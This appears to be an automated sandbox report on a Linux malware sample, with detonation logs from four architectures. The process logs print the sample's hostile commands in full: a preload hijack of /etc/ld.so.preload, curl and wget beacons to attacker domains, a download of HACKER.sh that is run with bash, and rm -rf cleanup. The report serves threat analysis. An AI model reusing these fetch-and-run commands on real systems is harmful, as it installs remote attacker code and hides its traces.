Analysis Overview
SHA256
03f504de2e804c515de12411e431085f509a593c5ec8e512adb0641eed87f287
Threat Level: Likely malicious
The file f62d2741ab07c859c2036988259d0b45_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Modifies the dynamic linker configuration file
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-17 16:18
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-17 16:18
Reported
2024-04-17 16:21
Platform
debian9-armhf-20240226-en
Max time kernel
13s
Max time network
17s
Command Line
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.8xapVZ | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.rBaWlO | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.GXSL7N | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Yq9DyS | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-17 16:18
Reported
2024-04-17 16:21
Platform
debian9-mipsbe-20240226-en
Max time kernel
14s
Max time network
16s
Command Line
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.2IC6wm | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Qzd0iI | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SRY9a9 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SudRtB | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-17 16:18
Reported
2024-04-17 16:21
Platform
debian9-mipsel-20240226-en
Max time kernel
19s
Max time network
20s
Command Line
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.SCA3Ao | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.SgW38J | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.4AOdCe | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.GaCaCK | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
Files
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-17 16:18
Reported
2024-04-17 16:21
Platform
ubuntu1804-amd64-20240226-en
Max time kernel
6s
Max time network
135s
Command Line
Signatures
Modifies the dynamic linker configuration file
| Description | Indicator | Process | Target |
| File opened for modification | /etc/ld.so.preload | /tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/self/fd | N/A | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.jPHFPi | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.WW6N6L | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.PfjOK0 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.z8f0Jt | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.aZrqJ7 | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.x1ShXA | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.jwg07S | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.J8dblm | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.VOjKzP | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.Bn7ROW | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.imb1Wp | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.jbUkxE | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.bMS5sx | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/.../t.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/fileutl.message.MgHAgI | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.7yNJnb | /usr/bin/apt-get | N/A |
| File opened for modification | /tmp/fileutl.message.5jSxc4 | /usr/bin/apt-get | N/A |
Processes
/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118
[/tmp/f62d2741ab07c859c2036988259d0b45_JaffaCakes118]
/bin/sed
[sed -En s/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p]
/usr/bin/apt-get
[apt-get install curl -y]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/curl
[curl https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/wget
[wget -q https://ghostsecurityapi.com/1/index.php?host= -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/1/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/1/ -O /dev/null]
/usr/bin/curl
[curl https://ghostsecurityteam.net/2/ -o /dev/null]
/usr/bin/wget
[wget https://ghostsecurityteam.net/2/ -O /dev/null]
/bin/mkdir
[mkdir ...]
/usr/bin/wget
[wget --quiet http://linux.ghststr.com/LLLOL/HACKER.sh -O t.sh]
/bin/bash
[bash t.sh]
/bin/rm
[rm -rf /tmp/...]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 1.1.1.1:53 | ghostsecurityapi.com | udp |
| US | 151.101.130.49:443 | tcp | |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | ghostsecurityteam.net | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 1.1.1.1:53 | linux.ghststr.com | udp |
| US | 151.101.65.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| US | 151.101.65.91:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.5:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/fileutl.message.z8f0Jt
| MD5 | 373fe2f2ef99005d2550a482f09a3e51 |
| SHA1 | 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d |
| SHA256 | 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5 |
| SHA512 | def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b |
/root/.bash_history
| MD5 | 68b329da9893e34099c7d8ad5cb9c940 |
| SHA1 | adc83b19e793491b1c6ea0fd8b46cd9f32e592fc |
| SHA256 | 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b |
| SHA512 | be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09 |